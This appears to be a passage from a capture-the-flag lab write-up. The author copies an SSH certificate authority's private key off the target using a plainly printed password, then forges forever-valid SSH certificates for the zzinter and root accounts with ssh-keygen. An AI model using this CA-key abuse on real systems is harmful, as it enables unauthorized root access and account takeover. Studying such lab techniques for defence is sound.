Certificates
msainristil@itrc:~$ ll
total 44K
4.0K drwxr-xr-x 1 msainristil msainristil 4.0K Aug 4 18:31 decommission_old_ca
8.0K drwx------ 1 msainristil msainristil 4.0K Aug 4 16:46 .
4.0K -rw------- 1 msainristil msainristil 1.4K Aug 4 16:46 .viminfo
4.0K drwx------ 2 msainristil msainristil 4.0K Aug 4 15:49 .ssh
0 lrwxrwxrwx 1 root root 9 Jul 23 14:22 .bash_history -> /dev/null
8.0K drwxr-xr-x 1 root root 4.0K Jul 23 14:22 ..
4.0K -rw-r--r-- 1 msainristil msainristil 220 Mar 29 19:40 .bash_logout
4.0K -rw-r--r-- 1 msainristil msainristil 3.5K Mar 29 19:40 .bashrc
4.0K -rw-r--r-- 1 msainristil msainristil 807 Mar 29 19:40 .profileUpon gaining the lateral movement to the msainristil user via SSH, I found an interesting directory in the home directory of the user
┌──(kali㉿kali)-[~/…/htb/labs/resource/certificates]
└─$ scp -r msainristil@$IP:~/decommission_old_ca .
msainristil@10.10.11.27's password: 82yards2closeit
ca-itrc.pub 100% 572 13.9KB/s 00:00
ca-itrc 100% 2602 60.8KB/s 00:00 Transferring those to Kali
decommission_old_ca
┌──(kali㉿kali)-[~/…/htb/labs/resource/certificates]
└─$ ll decommission_old_ca
total 28K
4.0K drwxr-xr-x 3 kali kali 4.0K Aug 4 20:39 ..
4.0K drwxr-xr-x 2 kali kali 4.0K Aug 4 20:39 .
4.0K -rw------- 1 kali kali 2.6K Aug 4 20:39 ca-itrc
4.0K -rw-r--r-- 1 kali kali 572 Aug 4 20:39 ca-itrc.pubThe decommision_old_ca directory appears to contain a keypair for CA
This must be what was mentioned in the messages
Key Signing for zzinter
┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ ssh-keygen -s ca-itrc -I zzinter -n zzinter ca-itrc
Signed user key ca-itrc-cert.pub: id "zzinter" serial 0 for zzinter valid foreverI can used the private key of the CA to sign the zzinter user
┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ ll
total 20K
4.0K drwxr-xr-x 2 kali kali 4.0K Aug 4 22:01 .
4.0K -rw-r--r-- 1 kali kali 2.0K Aug 4 22:01 ca-itrc-cert.pub
4.0K drwxr-xr-x 5 kali kali 4.0K Aug 4 22:00 ..
4.0K -rw------- 1 kali kali 2.6K Aug 4 20:39 ca-itrc
4.0K -rw-r--r-- 1 kali kali 572 Aug 4 20:39 ca-itrc.pub
┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ mv ca-itrc-cert.pub zzinter-itrc-cert.pubIt generated the public key file; ca-itrc-cert.pub
I can then use these to authenticate to the target system
Key Signing for root
┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ ssh-keygen -s ca-itrc -I root -n root ca-itrc
Signed user key ca-itrc-cert.pub: id "root" serial 0 for root valid foreverI also can used the private key of the CA to sign the root account as CA is essentially root
┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ mv ca-itrc-cert.pub root-itrc-cert.pubI also renamed it to be more distinguishable I can then use these to authenticate to the target system